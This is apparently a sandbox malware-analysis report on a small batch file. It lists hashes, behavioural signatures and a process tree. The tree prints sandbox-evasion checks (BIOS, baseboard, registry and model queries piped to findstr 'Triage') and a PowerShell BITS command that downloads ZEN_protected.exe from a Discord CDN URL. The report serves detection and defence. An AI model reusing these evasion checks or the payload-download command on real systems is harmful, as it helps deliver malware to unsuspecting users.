Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/10/2024, 04:09
Static task
static1
Behavioral task
behavioral1
Sample
O0JH5_NewTextDocument.bat
Resource
win7-20240903-en
General
-
Target
O0JH5_NewTextDocument.bat
-
Size
2KB
-
MD5
1249778163d6bf686b1eb98029fc689b
-
SHA1
eda466fb3713e0ef8887901036a82a0734b3d47e
-
SHA256
96c4762d494abe04fa78c60d19af178d3a82ee7d75bda3be35d3ef1e5f1225ca
-
SHA512
329774fc4a3a8acc91d4366a868323a53053c1e848c84445cadab6ac851df8dea57f16c9d877dd376611ae88c2ce9ea6fcaa970729c36f50859f77988b771a5b
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1291967647767859211/1291972588448514110/ZEN_protected.exe?ex=67020abc&is=6700b93c&hm=7b6c09bd4889de22214c218e9f6bd8b174172db46c5a7b2c5ca6d7b6793fe773
Signatures
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion reg.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum reg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 reg.exe -
pid Process 2756 powershell.exe 2676 powershell.exe 3044 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2756 powershell.exe 2676 powershell.exe 3044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2176 WMIC.exe Token: SeSecurityPrivilege 2176 WMIC.exe Token: SeTakeOwnershipPrivilege 2176 WMIC.exe Token: SeLoadDriverPrivilege 2176 WMIC.exe Token: SeSystemProfilePrivilege 2176 WMIC.exe Token: SeSystemtimePrivilege 2176 WMIC.exe Token: SeProfSingleProcessPrivilege 2176 WMIC.exe Token: SeIncBasePriorityPrivilege 2176 WMIC.exe Token: SeCreatePagefilePrivilege 2176 WMIC.exe Token: SeBackupPrivilege 2176 WMIC.exe Token: SeRestorePrivilege 2176 WMIC.exe Token: SeShutdownPrivilege 2176 WMIC.exe Token: SeDebugPrivilege 2176 WMIC.exe Token: SeSystemEnvironmentPrivilege 2176 WMIC.exe Token: SeRemoteShutdownPrivilege 2176 WMIC.exe Token: SeUndockPrivilege 2176 WMIC.exe Token: SeManageVolumePrivilege 2176 WMIC.exe Token: 33 2176 WMIC.exe Token: 34 2176 WMIC.exe Token: 35 2176 WMIC.exe Token: SeIncreaseQuotaPrivilege 2176 WMIC.exe Token: SeSecurityPrivilege 2176 WMIC.exe Token: SeTakeOwnershipPrivilege 2176 WMIC.exe Token: SeLoadDriverPrivilege 2176 WMIC.exe Token: SeSystemProfilePrivilege 2176 WMIC.exe Token: SeSystemtimePrivilege 2176 WMIC.exe Token: SeProfSingleProcessPrivilege 2176 WMIC.exe Token: SeIncBasePriorityPrivilege 2176 WMIC.exe Token: SeCreatePagefilePrivilege 2176 WMIC.exe Token: SeBackupPrivilege 2176 WMIC.exe Token: SeRestorePrivilege 2176 WMIC.exe Token: SeShutdownPrivilege 2176 WMIC.exe Token: SeDebugPrivilege 2176 WMIC.exe Token: SeSystemEnvironmentPrivilege 2176 WMIC.exe Token: SeRemoteShutdownPrivilege 2176 WMIC.exe Token: SeUndockPrivilege 2176 WMIC.exe Token: SeManageVolumePrivilege 2176 WMIC.exe Token: 33 2176 WMIC.exe Token: 34 2176 WMIC.exe Token: 35 2176 WMIC.exe Token: SeIncreaseQuotaPrivilege 1196 WMIC.exe Token: SeSecurityPrivilege 1196 WMIC.exe Token: SeTakeOwnershipPrivilege 1196 WMIC.exe Token: SeLoadDriverPrivilege 1196 WMIC.exe Token: SeSystemProfilePrivilege 1196 WMIC.exe Token: SeSystemtimePrivilege 1196 WMIC.exe Token: SeProfSingleProcessPrivilege 1196 WMIC.exe Token: SeIncBasePriorityPrivilege 1196 WMIC.exe Token: SeCreatePagefilePrivilege 1196 WMIC.exe Token: SeBackupPrivilege 1196 WMIC.exe Token: SeRestorePrivilege 1196 WMIC.exe Token: SeShutdownPrivilege 1196 WMIC.exe Token: SeDebugPrivilege 1196 WMIC.exe Token: SeSystemEnvironmentPrivilege 1196 WMIC.exe Token: SeRemoteShutdownPrivilege 1196 WMIC.exe Token: SeUndockPrivilege 1196 WMIC.exe Token: SeManageVolumePrivilege 1196 WMIC.exe Token: 33 1196 WMIC.exe Token: 34 1196 WMIC.exe Token: 35 1196 WMIC.exe Token: SeIncreaseQuotaPrivilege 1196 WMIC.exe Token: SeSecurityPrivilege 1196 WMIC.exe Token: SeTakeOwnershipPrivilege 1196 WMIC.exe Token: SeLoadDriverPrivilege 1196 WMIC.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2504 wrote to memory of 2176 2504 cmd.exe 32 PID 2504 wrote to memory of 2176 2504 cmd.exe 32 PID 2504 wrote to memory of 2176 2504 cmd.exe 32 PID 2504 wrote to memory of 2836 2504 cmd.exe 33 PID 2504 wrote to memory of 2836 2504 cmd.exe 33 PID 2504 wrote to memory of 2836 2504 cmd.exe 33 PID 2504 wrote to memory of 1196 2504 cmd.exe 35 PID 2504 wrote to memory of 1196 2504 cmd.exe 35 PID 2504 wrote to memory of 1196 2504 cmd.exe 35 PID 2504 wrote to memory of 2632 2504 cmd.exe 36 PID 2504 wrote to memory of 2632 2504 cmd.exe 36 PID 2504 wrote to memory of 2632 2504 cmd.exe 36 PID 2504 wrote to memory of 2412 2504 cmd.exe 37 PID 2504 wrote to memory of 2412 2504 cmd.exe 37 PID 2504 wrote to memory of 2412 2504 cmd.exe 37 PID 2504 wrote to memory of 2684 2504 cmd.exe 38 PID 2504 wrote to memory of 2684 2504 cmd.exe 38 PID 2504 wrote to memory of 2684 2504 cmd.exe 38 PID 2504 wrote to memory of 2644 2504 cmd.exe 39 PID 2504 wrote to memory of 2644 2504 cmd.exe 39 PID 2504 wrote to memory of 2644 2504 cmd.exe 39 PID 2504 wrote to memory of 2736 2504 cmd.exe 40 PID 2504 wrote to memory of 2736 2504 cmd.exe 40 PID 2504 wrote to memory of 2736 2504 cmd.exe 40 PID 2504 wrote to memory of 2752 2504 cmd.exe 41 PID 2504 wrote to memory of 2752 2504 cmd.exe 41 PID 2504 wrote to memory of 2752 2504 cmd.exe 41 PID 2752 wrote to memory of 2756 2752 cmd.exe 42 PID 2752 wrote to memory of 2756 2752 cmd.exe 42 PID 2752 wrote to memory of 2756 2752 cmd.exe 42 PID 2504 wrote to memory of 2900 2504 cmd.exe 43 PID 2504 wrote to memory of 2900 2504 cmd.exe 43 PID 2504 wrote to memory of 2900 2504 cmd.exe 43 PID 2504 wrote to memory of 3032 2504 cmd.exe 44 PID 2504 wrote to memory of 3032 2504 cmd.exe 44 PID 2504 wrote to memory of 3032 2504 cmd.exe 44 PID 2504 wrote to memory of 2580 2504 cmd.exe 45 PID 2504 wrote to memory of 2580 2504 cmd.exe 45 PID 2504 wrote to memory of 2580 2504 cmd.exe 45 PID 2580 wrote to memory of 2676 2580 cmd.exe 46 PID 2580 wrote to memory of 2676 2580 cmd.exe 46 PID 2580 wrote to memory of 2676 2580 cmd.exe 46 PID 2504 wrote to memory of 2708 2504 cmd.exe 47 PID 2504 wrote to memory of 2708 2504 cmd.exe 47 PID 2504 wrote to memory of 2708 2504 cmd.exe 47 PID 2504 wrote to memory of 3040 2504 cmd.exe 48 PID 2504 wrote to memory of 3040 2504 cmd.exe 48 PID 2504 wrote to memory of 3040 2504 cmd.exe 48 PID 2504 wrote to memory of 3044 2504 cmd.exe 49 PID 2504 wrote to memory of 3044 2504 cmd.exe 49 PID 2504 wrote to memory of 3044 2504 cmd.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\O0JH5_NewTextDocument.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\System32\Wbem\WMIC.exewmic bios get serialnumber2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\system32\findstr.exefindstr /i "Triage"2⤵PID:2836
-
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get manufacturer2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\system32\findstr.exefindstr /i "Triage"2⤵PID:2632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System" /v "SystemBiosVersion"2⤵
- Checks BIOS information in registry
PID:2412
-
-
C:\Windows\system32\findstr.exefindstr /i "Triage"2⤵PID:2684
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum" /v "0"2⤵
- Maps connected drives based on registry
PID:2644
-
-
C:\Windows\system32\findstr.exefindstr /i "Triage"2⤵PID:2736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "(Get-WmiObject -Class Win32_ComputerSystem).Model"2⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Get-WmiObject -Class Win32_ComputerSystem).Model"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo X9SRE/X9SRE-3F/X9SRi/X9SRi-3F "2⤵PID:2900
-
-
C:\Windows\system32\findstr.exefindstr /i "Triage"2⤵PID:3032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "(Get-WmiObject -Class Win32_ComputerSystem).Name"2⤵
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Get-WmiObject -Class Win32_ComputerSystem).Name"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo BIGGY "2⤵PID:2708
-
-
C:\Windows\system32\findstr.exefindstr /i "Triage"2⤵PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-BitsTransfer -Source 'https://cdn.discordapp.com/attachments/1291967647767859211/1291972588448514110/ZEN_protected.exe?ex=67020abc&is=6700b93c&hm=7b6c09bd4889de22214c218e9f6bd8b174172db46c5a7b2c5ca6d7b6793fe773' -Destination 'ZEN_protected.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3044
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54b8cc7cba256bb98fd6c0dae545dd4ad
SHA1d73cbccd88461bf789759b7b22214d87ce4dda75
SHA25663e11e70471973b217dc96aeca897c22a01a3963f826574c0f013efcc7b019cc
SHA51232f9b5e4198babfa918ed44b2288ac7a771788b884064f7dbc960797eb1ce2596483c5bbee03205641029b1a18bf33e12b29d69f8d24e5857f27b1071d90f466